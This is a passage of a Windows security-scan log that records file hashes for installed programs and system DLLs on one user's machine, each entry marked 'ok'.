15:34:00.0537 0x04bc  [ 4DF6E378A00B6F89CB35078054057C36, 981BE3859AC48F43E739885BDA6756C5583BFD7353A57669067C8FB170DAE097 ] C:\Program Files\CCleaner\CCleaner64.exe
15:34:00.0537 0x04bc  C:\Program Files\CCleaner\CCleaner64.exe - ok
15:34:00.0539 0x04bc  [ 6FCDE05B39B23C4FD3F3C372C287D2AF, C8CC5A1129C4E3CE41F2068B42BDB6C17D3ACFBA6E7837775F6FC4B2211F41DB ] C:\Windows\System32\igfxsrvc.exe
15:34:00.0539 0x04bc  C:\Windows\System32\igfxsrvc.exe - ok
15:34:00.0541 0x04bc  [ 45DB6103F0930C9845E4D9E3095D4F8D, 20A22470490687F5ED3D075BF8FE80267EE31516539F655FCD25A8C11B498EC7 ] C:\Users\boylem1\AppData\Local\NEC\UC700\NUvshost.exe
15:34:00.0541 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\NUvshost.exe - ok
15:34:00.0543 0x04bc  [ 57EB157779838C43B47F78721740FA7E, 6F780F6A2AF5F0DEB4A6B38482D1FB579DE6A3225A8ED5E3457720111A75C059 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe
15:34:00.0543 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe - ok
15:34:00.0544 0x04bc  [ D83947A58613E9091B4C9CC0F1546A8D, C71DF6E18E2099FC462717B8658D39C607A62C7E7A1E5CD0E258C17434535AD0 ] C:\Windows\SysWOW64\mscoree.dll
15:34:00.0544 0x04bc  C:\Windows\SysWOW64\mscoree.dll - ok
15:34:00.0546 0x04bc  [ BDDAFDB5F9517DFE97AD3750CF343819, 4DA9A1FE099CE2EF9F3BA2F30B391B2720806BB815D79CE7C0BEC101399B37FE ] C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
15:34:00.0546 0x04bc  C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe - ok
15:34:00.0548 0x04bc  [ 5E3C0E5FFDA48C5DA35BBFB8EFFF8066, E2BBCC111DB1CE6072CB796F21677E4529029CE66DDC471EC793278F81F1FCF6 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
15:34:00.0548 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll - ok
15:34:00.0550 0x04bc  [ 503117A1A66CCEBAE99C4AA080320AE4, 3A186D52F17CB84341B75FCB86ABE987DE8A97DFB1452256D3E3C545383F6493 ] C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll
15:34:00.0550 0x04bc  C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll - ok
15:34:00.0552 0x04bc  [ 766AE515B1749F2141E418CC6C08515B, 02DDB5A7DB8278AA47A951604818E73DB69155DBF1ECD06B6E11926204EADAE7 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
15:34:00.0552 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe - ok
15:34:00.0554 0x04bc  [ 4C7C4CADD2515329D9D40D7DC91C5930, 7F0BB59DF698C949217036F12579FFEDDD3444CFA26376824314E88E563EEF0D ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe
15:34:00.0554 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe - ok
15:34:00.0556 0x04bc  [ 85C2A87B30EE63D88B0452ED8A13FDF1, FA7EBA5E0D6E2C47A86A6E8CEF6AF4649F94323C2DB5403F45E0F4F5D026BD69 ] C:\Windows\System32\igfxdev.dll
15:34:00.0556 0x04bc  C:\Windows\System32\igfxdev.dll - ok
15:34:00.0558 0x04bc  [ 722D953718E6E1C57A83D3CE03374A1E, 2F87E0EE9A883432086A1FB4ACDBEA6A60E1CDA0314E0A5CB47150FDFFCEC02F ] C:\Windows\System32\igfxsrvc.dll
15:34:00.0558 0x04bc  C:\Windows\System32\igfxsrvc.dll - ok
15:34:00.0560 0x04bc  [ 8E2242BB3CB7A632A8CF22BDE2A41AE1, FB068D1EED054DB6935A5DE19DEA6AFCCE8C3F0F665973FDFB97431078207D91 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
15:34:00.0560 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll - ok
15:34:00.0562 0x04bc  [ FF98EF5A50EA52FA115FE60B0F0A92B1, 0B5266BF0A63C7A495BBF41143F34105AF5F5E7C79BB7B203EE8F78AE6C17231 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
15:34:00.0562 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll - ok
15:34:00.0564 0x04bc  [ 1951C6F1E53079F6B29ECFF77EAF9403, 1F9D236880F9BA65C96AD54FA1FA7454E798C969C69FAD86D8FDA14EDC46980E ] C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
15:34:00.0564 0x04bc  C:\Windows\SysWOW64\wbem\WmiPrvSE.exe - ok
15:34:00.0566 0x04bc  [ 47EA5F76FAB723C61AB4A0D79BAD512C, A7A38EB0A7068B160E6949945EF639F999A06AE35746F6E79C7350745798E5C9 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
15:34:00.0566 0x04bc  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe - ok
15:34:00.0568 0x04bc  [ C17FC2B8D522562B7A098345CC8851C3, D1AB9197775ECE8E4D7B4568994608BF7A6D771E0936D81D93C31C10469F9EFA ] C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
15:34:00.0568 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\concentr.exe - ok
15:34:00.0570 0x04bc  [ D1DE1EAFDE97BE41CF6585027FF3E732, 76F17D4DF440D6734DC8157092D94EB18C2A73A0A49BEEA289E7B3EDE30E86A2 ] C:\Windows\SysWOW64\comdlg32.dll
15:34:00.0570 0x04bc  C:\Windows\SysWOW64\comdlg32.dll - ok
15:34:00.0572 0x04bc  [ 0DCA5F8AF83975061D9D8340DC471B5C, 71C8549419F46ABB4826B1847BF325374FA5C237CE14DB8B1DD8BB6FDABF6138 ] C:\Windows\SysWOW64\msvcr110_clr0400.dll
15:34:00.0572 0x04bc  C:\Windows\SysWOW64\msvcr110_clr0400.dll - ok
15:34:00.0574 0x04bc  [ 2BCBA6052374959A30BD7948444DBB79, 46224A2B729026FEEBC3C6A09E69919D477097848DB2CA0C2F5B166CDF379660 ] C:\Windows\System32\gameux.dll
15:34:00.0574 0x04bc  C:\Windows\System32\gameux.dll - ok
15:34:00.0576 0x04bc  [ C1F1E53851FAA7E029CFA07DAF9A5E81, 5FED0DC48651735AEBF53D5B7C16D13A9F7205B9EBEFE829022FC9281A940718 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll
15:34:00.0576 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll - ok
15:34:00.0579 0x04bc  [ 9E4B0E7472B4CEBA9E17F440B8CB0AB8, B1A9B2EF000917214C0198958CBD239D1D91B1720EC40DF041262A34D302AD74 ] C:\Windows\SysWOW64\winspool.drv
15:34:00.0579 0x04bc  C:\Windows\SysWOW64\winspool.drv - ok
15:34:00.0581 0x04bc  [ F7606EA5B7DE23483520415DD9165695, 63D3BD831E94F9385CB9965A09594500D114C866915490B0CDA7954907D36161 ] C:\Program Files (x86)\Citrix\ICA Client\pnagent.exe
15:34:00.0581 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\pnagent.exe - ok
15:34:00.0583 0x04bc  [ A72FB8DCD04639175AC4C59847BE8DA2, 23D972CA6AE5DA997D6C4F79A2F94C4C18A3EED23785F87E239620F3D1E9EA60 ] C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
15:34:00.0583 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\redirector.exe - ok
15:34:00.0585 0x04bc  [ 0B3595A4FF0B36D68E5FC67FD7D70FDC, 372AF797353F9335915CD06D4076BAB8410775DCAF2DAC0593197D7C41BBFFB2 ] C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcp80.dll
15:34:00.0585 0x04bc  C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcp80.dll - ok
15:34:00.0587 0x04bc  [ 4D05A30591323B8F55D29A3B8283A867, E6047498CD8609E9B81796EF75DA30F20BD2E1E61792CD157169707571F4B5A1 ] C:\Windows\SysWOW64\ncobjapi.dll
15:34:00.0587 0x04bc  C:\Windows\SysWOW64\ncobjapi.dll - ok
15:34:00.0589 0x04bc  [ 3E2EA277D6F5A437AE2D042EC76AB267, DAB2E873D1576F3FFBAFCEAD3B1F313341B4925015FBF24825D91132D579471C ] C:\Windows\SysWOW64\wbem\wmiutils.dll
15:34:00.0589 0x04bc  C:\Windows\SysWOW64\wbem\wmiutils.dll - ok
15:34:00.0591 0x04bc  [ B7A50025E0D3521E6AA4D2F047C95F61, 9C37CC43A41BA15B4F4095D06E8AAA1C842DAACD6D698A7F249BFEDCEA0BD60D ] C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
15:34:00.0591 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll - ok
15:34:00.0594 0x04bc  [ C3761661C17C2248A9379A8FB89E3DE1, CE3477FA2B4058EB80739E0161FE957545F13CF86D313F6422732901D35F75F2 ] C:\Windows\System32\stobject.dll
15:34:00.0594 0x04bc  C:\Windows\System32\stobject.dll - ok
15:34:00.0596 0x04bc  [ 75F5E1FE8D55CF8E577E0EC5F2290D3F, F4E2C81F0834018052A481AE8D7DF4780302A6844160CCDC09F7D82D3B992BDE ] C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_ec80f00e8593ece5\comctl32.dll
15:34:00.0596 0x04bc  C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_ec80f00e8593ece5\comctl32.dll - ok
15:34:00.0598 0x04bc  [ 23F43730606FA0C487E0DFAF4EE28435, 335FCAC1D7047EB522A1273171E116AEDDB6071E6DB28B5DC9AA1B0D833629D7 ] C:\Program Files (x86)\Citrix\ICA Client\ctxmui.dll
15:34:00.0598 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\ctxmui.dll - ok
15:34:00.0600 0x04bc  [ F832EEEA97CDDA1AF577E721F652A0D1, EBBB7CA199BA4DF231123922BD310D43DE0104C6185B70FE0281B938D5336F2E ] C:\Windows\System32\batmeter.dll
15:34:00.0600 0x04bc  C:\Windows\System32\batmeter.dll - ok
15:34:00.0602 0x04bc  [ 1D281C5353D1B12AFB9C4A4AE61E5675, 508D6DD6C45027E3CDA3D93364980F32FFC34C684A424C769954D741CF0D40D0 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat.exe
15:34:00.0602 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat.exe - ok
15:34:00.0605 0x04bc  [ 9DD06F00898AA5CA7E24186EFC8E5E25, 51141D0D07DBC955B63281351D3F17163ACE9A5B08628EA1C82F33FD2913970E ] C:\Users\boylem1\AppData\Local\Temp\{87F5925F-845D-4305-831E-0E18C5744C03}\{DDFE6E02-B601-4BAA-9D46-3F703EECACA3}.tmp
15:34:00.0605 0x04bc  C:\Users\boylem1\AppData\Local\Temp\{87F5925F-845D-4305-831E-0E18C5744C03}\{DDFE6E02-B601-4BAA-9D46-3F703EECACA3}.tmp - ok
15:34:00.0608 0x04bc  [ 91A7771934C0D9D2DA7699D25BB5B348, 154A6EB866AF22B38AEE8DB5A864653FEB15DED69DE26E5B602B7C5056CDDF72 ] C:\Users\boylem1\AppData\Local\Temp\{87F5925F-845D-4305-831E-0E18C5744C03}\{FF7C0D9E-2659-4642-A86E-66B4EC1FAF18}.tmp
15:34:00.0608 0x04bc  C:\Users\boylem1\AppData\Local\Temp\{87F5925F-845D-4305-831E-0E18C5744C03}\{FF7C0D9E-2659-4642-A86E-66B4EC1FAF18}.tmp - ok
15:34:00.0610 0x04bc  [ 80808656078CFCC32CF8BFEB0DD66279, 383F37599ABF16EEDEB2A60242DB7EDCC3D210A2A59DD61169047059F7041C5C ] C:\Users\boylem1\AppData\Local\Temp\{87F5925F-845D-4305-831E-0E18C5744C03}\{903454EA-1366-4E2E-B295-3B01F483B1F1}.tmp
15:34:00.0610 0x04bc  C:\Users\boylem1\AppData\Local\Temp\{87F5925F-845D-4305-831E-0E18C5744C03}\{903454EA-1366-4E2E-B295-3B01F483B1F1}.tmp - ok
15:34:00.0612 0x04bc  [ 36D9D26C61D77E4223B6D763B28CB29D, 06602F6D24C7AD8701B576C0D2922E898AC6846FB370CC1FDF67ADCFBF15BE38 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\logsession.dll
15:34:00.0612 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\logsession.dll - ok
15:34:00.0614 0x04bc  [ 437E07DB32ED248867793C87AC75D383, 36E06978282ED02639AB598C66B2833D1DCC673CC216E5A49A9D31172B8DE305 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\MEWMIProv\MeProv.dll
15:34:00.0615 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\MEWMIProv\MeProv.dll - ok
15:34:00.0617 0x04bc  [ 2D2A6EC8EAD30EC3ACE2FD6FB1B3E122, E7EA375A3BDE8FC764CB09524344370B9EE25F98AD6C83E6F37A569EB8D277D6 ] C:\Windows\System32\prnfldr.dll
15:34:00.0617 0x04bc  C:\Windows\System32\prnfldr.dll - ok
15:34:00.0619 0x04bc  [ 102CF6879887BBE846A00C459E6D4ABC, A4C51C79CF95D5C79DCEFB02946A09A987FEAF83CE2EE1BA7677EBA90869AC80 ] C:\Windows\SysWOW64\riched20.dll
15:34:00.0619 0x04bc  C:\Windows\SysWOW64\riched20.dll - ok
15:34:00.0620 0x04bc  [ 667F63419A9C91B1CCB3B37592F893DF, 1B438F283AAE481E8980E3662FE5B337E963825EFA8ECD191B9C42503EAEF674 ] C:\Program Files (x86)\Citrix\ICA Client\CCMSDK.dll
15:34:00.0620 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\CCMSDK.dll - ok
15:34:00.0622 0x04bc  [ 42A9CB6906D9A8BEDC83B57163E62924, E18522D3137653140757829EFBFCE624A5BAA5842E2BBA10B9E5AB6C84BE49E1 ] C:\Windows\System32\DXP.dll
15:34:00.0622 0x04bc  C:\Windows\System32\DXP.dll - ok
15:34:00.0624 0x04bc  [ E2A17BCC08D92F42E08AF6BA2F93ABA7, 5FC9D47BF4B1094BECC0C0DDCD5CD4318DD3E4495D982F8785331616D5B82599 ] C:\Windows\SysWOW64\ExplorerFrame.dll
15:34:00.0624 0x04bc  C:\Windows\SysWOW64\ExplorerFrame.dll - ok
15:34:00.0627 0x04bc  [ 2BC7C9FD0A9F2C9AFC373F3AD1EE3891, 0A82A475301202791A7C10F978F952EAB7DB146A702D4EA67E24E2C98BC19638 ] C:\Windows\System32\Syncreg.dll
15:34:00.0627 0x04bc  C:\Windows\System32\Syncreg.dll - ok
15:34:00.0629 0x04bc  [ C836175870E00ACC546066632E15BD10, 4347F3319C26DA1C38F395C74DBD67AF886149C8F29EDE765DD96C8480A3054A ] C:\Windows\ehome\ehSSO.dll
15:34:00.0629 0x04bc  C:\Windows\ehome\ehSSO.dll - ok
15:34:00.0631 0x04bc  [ A42F2C1EB3B66C54FB3C7B79D30C1A6D, A63836DB3B01835DC1311526A95198D6EBCCB1DC9DDAFBC38EC36C128CDB98B9 ] C:\Windows\System32\netshell.dll
15:34:00.0631 0x04bc  C:\Windows\System32\netshell.dll - ok
15:34:00.0633 0x04bc  [ 1129F550CD18B9B58FE3B9E6FCC4F9AC, CE74AD6E9D456F177187FF36877B83FFDC946B8BDEAE8E2C5002895C4C9DCA6F ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\MEWMIProv\WsmanClient.dll
15:34:00.0633 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\MEWMIProv\WsmanClient.dll - ok
15:34:00.0635 0x04bc  [ 635DFE83778C1046FD462A92D3DB106E, D37A34E941AC87AD66DDEF7C84E1FA59E61F645DFAAE3536E31BC67D113AAF06 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\LogTransport2.dll
15:34:00.0636 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\LogTransport2.dll - ok
15:34:00.0638 0x04bc  [ 772C6FF6B0209D441CA095F757CB795E, FCCB54A16DC92C76C7CE7CD20F431E80D61374A26A64CC8EFFF4C45E9027E34D ] C:\Program Files (x86)\Citrix\ICA Client\resource\en\ctxmuiUI.dll
15:34:00.0638 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\resource\en\ctxmuiUI.dll - ok
15:34:00.0640 0x04bc  [ 6E1F8165C365D35C8E3C045AF0CDD481, B861360D0A014265A0BEB4CC2FE31EA05AE95120E8B07820C13A044D64C00E2B ] C:\Windows\SysWOW64\duser.dll
15:34:00.0640 0x04bc  C:\Windows\SysWOW64\duser.dll - ok
15:34:00.0643 0x04bc  [ AA6D83490E62E1DA3A8D855E0D957FFC, FF9B35828DC84B573F25BC6597264DF25289B8670AADE60804A866F3CDD98A3B ] C:\Program Files (x86)\Citrix\ICA Client\resource\en\concenUI.dll
15:34:00.0643 0x04bc  C:\Program Files (x86)\Citrix\ICA Client\resource\en\concenUI.dll - ok
15:34:00.0645 0x04bc  [ EE06B85BC69F18826302348A2AD089E0, 417205797CC9F6C986A863A61179784D9ADCAF1961EF8A4D9042D73C5A86509A ] C:\Windows\SysWOW64\dui70.dll
15:34:00.0645 0x04bc  C:\Windows\SysWOW64\dui70.dll - ok
15:34:00.0648 0x04bc  [ 09A116FB06C5E362EF8938D29CDAB27B, 887B39388C39FF262FBBE3047FA1F5F47EB649AF3D760865AFE614DE64160D33 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
15:34:00.0648 0x04bc  C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll - ok
15:34:00.0651 0x04bc  [ 2BA62D514C0481A5F9B72987CE0566A8, F91ED59CBA04C4619F05B4AE20C39C47B1D97AA669787A2C616A7B866E9856D2 ] C:\Users\boylem1\AppData\Local\Citrix\Receiver\WindowsAppRHelper_concentr.exe.dll
15:34:00.0651 0x04bc  C:\Users\boylem1\AppData\Local\Citrix\Receiver\WindowsAppRHelper_concentr.exe.dll - ok
15:34:00.0653 0x04bc  [ 22A90D30B4C38C4C7418DD6F8D51F353, 6D67791D3ED9B5DF5B0E9D051933608A278371F52E1D648909C56EC40C87A762 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcurl.dll
15:34:00.0653 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcurl.dll - ok
15:34:00.0656 0x04bc  [ 38E9C0111B0F084ED72524BAEA6E3DA5, 8FC6B5A53C3892237CAE8D34AFF79592976FF48D9C32D5EDD688E31AF99F1A25 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libeay32.dll
15:34:00.0656 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libeay32.dll - ok
15:34:00.0658 0x04bc  [ CDBE9690CF2B8409FACAD94FAC9479C9, 8E7FE1A1F3550C479FFD86A77BC9D10686D47F8727025BB891D8F4F0259354C8 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\msvcr90.dll
15:34:00.0658 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\msvcr90.dll - ok
15:34:00.0661 0x04bc  [ 91384F646E69906E1B3413F817D304AF, E13A84AFB8424A0B018798090704FE091A5D37AB7D3E685380B4480147AA18C7 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ssleay32.dll
15:34:00.0661 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ssleay32.dll - ok
15:34:00.0663 0x04bc  [ 2A68336FCA868056241034166357B4A7, 9D8E3E817B9C3042E1CE63B97135EC9E5E1DF421B20D59C566BC578D085CB2D9 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csflogger.dll
15:34:00.0663 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csflogger.dll - ok
15:34:00.0665 0x04bc  [ 2BFFC3C8BBCB110451ABA844F2359513, 2145CE87893811F2C6F13995AA824E0B663D6977BA75F32E4E0483578830F454 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JCFCoreUtils.dll
15:34:00.0665 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JCFCoreUtils.dll - ok
15:34:00.0668 0x04bc  [ A81104F9D98F46CA7E1351DCB694DE8A, 28358ABD9309FF55084521E56008DCA41AB708575D08FDEC5D6505330B155CD4 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\log4cxx.dll
15:34:00.0668 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\log4cxx.dll - ok
15:34:00.0670 0x04bc  [ E3E26071939B9123DBA94C51E45CDAE4, C7AB91B93FEB565DF81CEB18836300256296100889499C2B016818C031D0A2C9 ] C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
15:34:00.0670 0x04bc  C:\Program Files (x86)\Citrix\Receiver\Receiver.exe - ok
15:34:00.0672 0x04bc  [ 311C2664FA7B215B31345469D7B143C6, AAA73AFFB119B0ACE6B2CAC4956F40A3E1007D74904E4C4DE53A0E82D72DBE6D ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System\17a393b77ae757f0768501fb95ff5af6\System.ni.dll
15:34:00.0672 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System\17a393b77ae757f0768501fb95ff5af6\System.ni.dll - ok
15:34:00.0675 0x04bc  [ 32B80EC0484302CC125CF13A893A1512, 1F0589F53552F024195ED0805D9F4D8406852B043761C53D2AA8ADAB000ADA90 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorUtil.dll
15:34:00.0675 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorUtil.dll - ok
15:34:00.0677 0x04bc  [ 4C39358EBDD2FFCD9132A30E1EC31E16, 06918CF99AD26CD6CF106881C0D5BDB212DC0BAC4549805C9F5906E3D03D152C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\msvcp90.dll
15:34:00.0677 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\msvcp90.dll - ok
15:34:00.0679 0x04bc  [ AA60FC73326973A774036486421F386C, BF798303F256B3020E6E7B4CA57CB00852741BCB7A514E66CB6F2E37FBE40472 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System\908ba9e296e92b4e14bdc2437edac603\System.ni.dll
15:34:00.0679 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System\908ba9e296e92b4e14bdc2437edac603\System.ni.dll - ok
15:34:00.0681 0x04bc  [ C13A4B9FB6B1D150D542C107ACB6A0EA, E54BA2C7E1EB8D56A1E21C7469E9D7976012671585A88A3ACEB60809E5C5C875 ] C:\Program Files\Internet Explorer\iexplore.exe
15:34:00.0681 0x04bc  C:\Program Files\Internet Explorer\iexplore.exe - ok
15:34:00.0684 0x04bc  [ F23D4356CF3DF5BE67C6EAD6E4E1B5F3, 6125275499FECA0A5CDE71574C28E68BF3C36E304016F3B773D8C8F7A3CF5F54 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libxml2.dll
15:34:00.0684 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libxml2.dll - ok
15:34:00.0686 0x04bc  [ C8FDF0FA9E97E2FAAF3F814716AAA881, DD24A1CAB44D943B0E1A795A347AD25D9305FC7F012A2566A6A14BD47221831F ] C:\Windows\System32\WPDShServiceObj.dll
15:34:00.0686 0x04bc  C:\Windows\System32\WPDShServiceObj.dll - ok
15:34:00.0688 0x04bc  [ 92DBF0A4C9239169010FC6E07859C82E, 00FB2CF4420F0FFEF519AFE732A708CF249640121E2A891CAA164313ABD7F804 ] C:\Windows\System32\ActionCenter.dll
15:34:00.0688 0x04bc  C:\Windows\System32\ActionCenter.dll - ok
15:34:00.0690 0x04bc  [ 9E2B9928C89A9D0DA1D3E8F4BD96AFA7, 8899B4ED3446B7D55B54DEFBC1ACB7C5392A4B3BC8EC2CDC7C31171708965043 ] C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\LogTransport2.exe
15:34:00.0690 0x04bc  C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\LogTransport2.exe - ok
15:34:00.0692 0x04bc  [ 8E853669C854370232C7EC9ED63267E0, D60927E5B42FA7541EA2E5FFEB89D7F6274C7151F1FF9E45AC8D7F9392D9C21E ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\HttpDownloader.dll
15:34:00.0692 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\HttpDownloader.dll - ok
15:34:00.0694 0x04bc  [ 6EF5F3F18413C367195F06E503AB86A6, 6F8B87FB4D67F9E76A51EF759B58A95D903C4AAC9C789A65A3FA1FC4F253D978 ] C:\Windows\SysWOW64\d3d9.dll
15:34:00.0694 0x04bc  C:\Windows\SysWOW64\d3d9.dll - ok
15:34:00.0696 0x04bc  [ 0AFFEBBF93CF0BBA5950CC87CEC66CE6, D300926A8652EDE8F3C079E1D74795C36CDAFDB7C55CAFB4F7713CE0F0197927 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csfnetutils.dll
15:34:00.0696 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csfnetutils.dll - ok
15:34:00.0698 0x04bc  [ 76C15C414A06D220F70B1995F9039413, AAFCE7B2E56D877FB693FC3AD292DA5D720A4C9F058A7F915B2BC26C8C2D1A85 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\dnsutils.dll
15:34:00.0699 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\dnsutils.dll - ok
15:34:00.0701 0x04bc  [ E9280B80E75C87DCA9BE1B9A596D4479, C6C80A7940FE8355520F6EC5D66624A3392DDA041B55A327151A590EE054802E ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JabberUtils.dll
15:34:00.0701 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JabberUtils.dll - ok
15:34:00.0703 0x04bc  [ 7DC08B74D453379CFA666F1248176F58, CBF74D253AD6563DA2C9737D91F6FB10CBE7E15B1FC6B60BA4428FAA97006F24 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\htmlcxx.dll
15:34:00.0703 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\htmlcxx.dll - ok
15:34:00.0705 0x04bc  [ 47093681D68F84DDAF84E629AA9E47CA, A4F77D2B63CF0805123C3FCE2787075B1B988A14AE92CBC8DD183690F315DBAC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\wcl_dll.dll
15:34:00.0705 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\wcl_dll.dll - ok
15:34:00.0707 0x04bc  [ 04CB7C8FDC6D9640DD82A527208F72C4, 0F8A327B0234A29EAB1F03D9102A3DF7DB4515BF580163198C5A8C174C98DE4F ] C:\Windows\System32\UIAnimation.dll
15:34:00.0707 0x04bc  C:\Windows\System32\UIAnimation.dll - ok
15:34:00.0709 0x04bc  [ 4F3CD1C59EA71401E155C432BCECE180, 6D4118A627CAE509E43D0CC0062EECAA0990C955BB15AE24834460551B2F51A2 ] C:\Windows\System32\PortableDeviceTypes.dll
15:34:00.0709 0x04bc  C:\Windows\System32\PortableDeviceTypes.dll - ok
15:34:00.0711 0x04bc  [ E7368F0A8D19445EAF5C5D0DBB8B8DAB, CF9082360E32A7C3E13A67AC2C6192F4A76870D43DA9FF2936993A637F712761 ] C:\Windows\System32\AltTab.dll
15:34:00.0711 0x04bc  C:\Windows\System32\AltTab.dll - ok
15:34:00.0712 0x04bc  [ 10F815BE90A66AAFC6C713D1BD626064, 01139FC04BC53594296F6A0E16B8D20B940F64BC8119FE7705C03C4947958F39 ] C:\Windows\System32\pnidui.dll
15:34:00.0712 0x04bc  C:\Windows\System32\pnidui.dll - ok
15:34:00.0714 0x04bc  [ 77B1471A490B53B24EFE136F09F76550, A650C3A244306F8E605BDA8E74BFE438356BA4403B0CB61E980D3183E3F0A7C7 ] C:\Windows\SysWOW64\d3d8thk.dll
15:34:00.0714 0x04bc  C:\Windows\SysWOW64\d3d8thk.dll - ok
15:34:00.0716 0x04bc  [ D3DCA69267D54A372E0353C56529966A, 7FB7BD771EEEF8A84281A8278D5667F53E18B75701B4B56C9552DCB2BC2F446D ] C:\Windows\SysWOW64\atiu9pag.dll
15:34:00.0716 0x04bc  C:\Windows\SysWOW64\atiu9pag.dll - ok
15:34:00.0718 0x04bc  [ B9F0A4020AA98B7A20287BF7FE99A1FD, 21138F161EEEA46198890C7A2D073F2C82829E15676131BDAD9F237EDC7477CD ] C:\Windows\System32\QUTIL.DLL
